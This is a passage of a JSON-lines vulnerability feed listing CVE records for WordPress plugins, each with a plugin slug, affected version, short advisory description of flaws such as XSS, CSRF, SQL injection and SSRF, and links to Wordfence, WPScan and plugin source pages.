page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77bed6ce-84e7-4b71-8acd-bb5b73e362d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77bed6ce-84e7-4b71-8acd-bb5b73e362d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-obfuscate-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-obfuscate-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9839","slug":"uix-slideshow","versionImpact":"1.6.5","description":"The The Uix Slideshow plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.6.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f189f606-ec30-4f5d-81c9-d526ba7141f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f189f606-ec30-4f5d-81c9-d526ba7141f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-slideshow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-slideshow\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-slideshow\\\/trunk\\\/includes\\\/shortcodes.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-slideshow\\\/trunk\\\/includes\\\/shortcodes.php#L26\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11093","slug":"sg-helper","description":"The SG Helper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in version 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sg-helper\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sg-helper\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9016822f-f167-4225-8216-e74cd687443c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9016822f-f167-4225-8216-e74cd687443c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12140","slug":"ai-addons-for-elementor","versionImpact":"2.2.1","description":"The Elementor Addons AI Addons \u2013 70 Widgets, Premium Templates, Ultimate Elements plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.1 via the render function due to insufficient restrictions on which templates can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft templates that they should not have access to.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/accordion.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/accordion.php#L958\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/tab.php#L905\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/tab.php#L905\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00d83a7-dd7a-407d-b44e-7ee0a2a1492a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00d83a7-dd7a-407d-b44e-7ee0a2a1492a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0865","slug":"wp-media-category-management","description":"The WP Media Category Management plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 2.0 to 2.3.3. This is due to missing or incorrect nonce validation on the wp_mcm_handle_action_settings() function. This makes it possible for unauthenticated attackers to alter plugin settings, such as the taxonomy used for media, the base slug for media categories, and the default media category via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/tags\\\/2.3.3\\\/include\\\/admin\\\/class-WP_MCM_Render_Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/tags\\\/2.3.3\\\/include\\\/admin\\\/class-WP_MCM_Render_Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/class-WP_MCM_Options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/class-WP_MCM_Options.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242626\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242626\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-category-management\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-category-management\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d42ca2f-f061-4cd1-812b-46d42c440498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d42ca2f-f061-4cd1-812b-46d42c440498?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8050","slug":"custom-author-base","versionImpact":"1.1.1","description":"The Custom Author Base WordPress plugin through 1.1.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28c9c127-464a-4750-8b62-a9b90b01f1af\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28c9c127-464a-4750-8b62-a9b90b01f1af\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6739","slug":"wpquiz","versionImpact":"0.4.2","description":"The WPQuiz plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'wpquiz' shortcode in all versions up to, and including, 0.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpquiz\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpquiz\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16444905-b111-4b4f-a9f0-d8728da2ebfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16444905-b111-4b4f-a9f0-d8728da2ebfb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0075","slug":"amazonjs","versionImpact":"0.10","description":"The Amazon JS WordPress plugin through 0.10 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/097acd6f-3291-4cdc-a054-4432b6350411\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/097acd6f-3291-4cdc-a054-4432b6350411\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1869","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrative-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a81d5615-0b96-4d89-a525-7e80a10a9317?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a81d5615-0b96-4d89-a525-7e80a10a9317?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3055","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_save' function. This makes it possible for unauthenticated attackers to update the post content and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efeffa2-b21a-4aa1-93b0-51c775758ab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efeffa2-b21a-4aa1-93b0-51c775758ab1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2721\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2721\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0489","slug":"slideonline","versionImpact":"1.2.1","description":"The SlideOnline WordPress plugin through 1.2.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/238842ee-6392-4eb2-96cb-08e4ece6fca1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/238842ee-6392-4eb2-96cb-08e4ece6fca1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6738","slug":"pagelayer","versionImpact":"1.7.8","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pagelayer_header_code', 'pagelayer_body_open_code', and 'pagelayer_footer_code' meta fields in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This appears to be a reintroduction of a vulnerability patched in version 1.7.7.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d14c8890-482c-4d43-a68f-0d04c4feca8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d14c8890-482c-4d43-a68f-0d04c4feca8f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/trunk\\\/main\\\/post_metas.php#L527\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/trunk\\\/main\\\/post_metas.php#L527\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/pagelayer\\\/tags\\\/1.7.8&old=3016486&new_path=\\\/pagelayer\\\/tags\\\/1.7.9&new=3016486&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/pagelayer\\\/tags\\\/1.7.8&old=3016486&new_path=\\\/pagelayer\\\/tags\\\/1.7.9&new=3016486&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0978","slug":"jonradio-private-site","versionImpact":"3.0.14","description":"The My Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.14 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's site privacy feature and view restricted page and post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970bc71c-7d0a-4761-874a-379cda71418e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970bc71c-7d0a-4761-874a-379cda71418e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036015\\\/jonradio-private-site\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036015\\\/jonradio-private-site\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0780","slug":"enjoy-instagram-instagram-responsive-images-gallery-and-carousel","versionImpact":"6.2.2","description":"The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation when resetting its database, allowing any authenticated users, such as subscriber to perform such action","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be3045b1-72e6-450a-8dd2-4702a9328447\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be3045b1-72e6-450a-8dd2-4702a9328447\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5601","slug":"mediavine-create","versionImpact":"1.9.7","description":"The Create by Mediavine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Schema Meta shortcode in all versions up to, and including, 1.9.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d04d8c1-75c0-447c-a26a-c2724c0a6618?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d04d8c1-75c0-447c-a26a-c2724c0a6618?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediavine-create\\\/trunk\\\/class-plugin.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediavine-create\\\/trunk\\\/class-plugin.php#L575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108144\\\/#file794\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108144\\\/#file794\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5582","slug":"schema-and-structured-data-for-wp","versionImpact":"1.33","description":"The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'url' attribute within the Q&A Block widget in all versions up to, and including, 1.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab650b99-ab15-4ddc-a622-cb43ab554ba7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab650b99-ab15-4ddc-a622-cb43ab554ba7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.31\\\/modules\\\/elementor\\\/widgets\\\/qanda-block.php#L355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.31\\\/modules\\\/elementor\\\/widgets\\\/qanda-block.php#L355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/class-qanda-block.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/class-qanda-block.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-and-structured-data-for-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-and-structured-data-for-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10374","slug":"wp-members","versionImpact":"3.4.9.5","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpmem_loginout shortcode in all versions up to, and including, 3.4.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ea93a49-0e1a-4a24-8f6b-03e624f517d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ea93a49-0e1a-4a24-8f6b-03e624f517d4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172530\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172530\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9615","slug":"bulkpress","versionImpact":"0.3.5","description":"The BulkPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.3.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbce4588-fbd2-4b75-8f67-51c7d02892be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbce4588-fbd2-4b75-8f67-51c7d02892be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulkpress\\\/trunk\\\/lib\\\/classes\\\/AdminMenuPage\\\/class.Abstract.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulkpress\\\/trunk\\\/lib\\\/classes\\\/AdminMenuPage\\\/class.Abstract.php#L221\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10952","slug":"authors-list","versionImpact":"2.0.4","description":"The The Authors List plugin for WordPress is vulnerable to arbitrary shortcode execution via update_authors_list_ajax AJAX action in all versions up to, and including, 2.0.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authors-list\\\/tags\\\/2.0.4\\\/backend\\\/includes\\\/class-authors-list-item.php#L843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authors-list\\\/tags\\\/2.0.4\\\/backend\\\/includes\\\/class-authors-list-item.php#L843\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/authors-list\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/authors-list\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b3cfe0a-dcfb-40f3-ba43-4e838c113010?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b3cfe0a-dcfb-40f3-ba43-4e838c113010?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpkube.com\\\/\",\"name\":\"https:\\\/\\\/www.wpkube.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11869","slug":"buk-appointments","versionImpact":"1.0.7","description":"The Buk for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buk' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buk-appointments\\\/trunk\\\/buk.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buk-appointments\\\/trunk\\\/buk.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buk-appointments\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buk-appointments\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12126","slug":"seo-keywords","versionImpact":"1.1.3","description":"The SEO Keywords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018google_error\u2019 parameter in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-keywords\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-keywords\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/325c2350-174b-4117-bacd-ae28bf3b16bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/325c2350-174b-4117-bacd-ae28bf3b16bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13854","slug":"education-addon","versionImpact":"1.3.1","description":"The Education Addon for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.1 via the naedu_elementor_template shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract information from posts that are not public, including drafts, password protected, and restricted posts. This applies to posts created with Elementor only.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/education-addon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/education-addon\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50e8811c-07b1-4325-92a4-dc1c91afbe9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50e8811c-07b1-4325-92a4-dc1c91afbe9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13868","slug":"easy-broken-link-checker","versionImpact":"9.0.2","description":"The URL Shortener | Conversion Tracking  | AB Testing  | WooCommerce WordPress plugin through 9.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bff1645-dd53-4416-a90f-7cf4a6b33c1a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bff1645-dd53-4416-a90f-7cf4a6b33c1a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8032","slug":"smooth-gallery-replacement","versionImpact":"1.0","description":"The Smooth Gallery Replacement WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c9120b1-ca81-411b-a2e2-a8d30f32a74b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c9120b1-ca81-411b-a2e2-a8d30f32a74b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6729","slug":"woocommerce-paymaster-gateway-019","versionImpact":"0.4.31","description":"The PayMaster for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.4.31 via the 'wp_ajax_paym_status' AJAX action This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-paymaster-gateway-019\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-paymaster-gateway-019\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b9b501e-2ce7-43d8-bad2-6c3176eed8e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b9b501e-2ce7-43d8-bad2-6c3176eed8e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
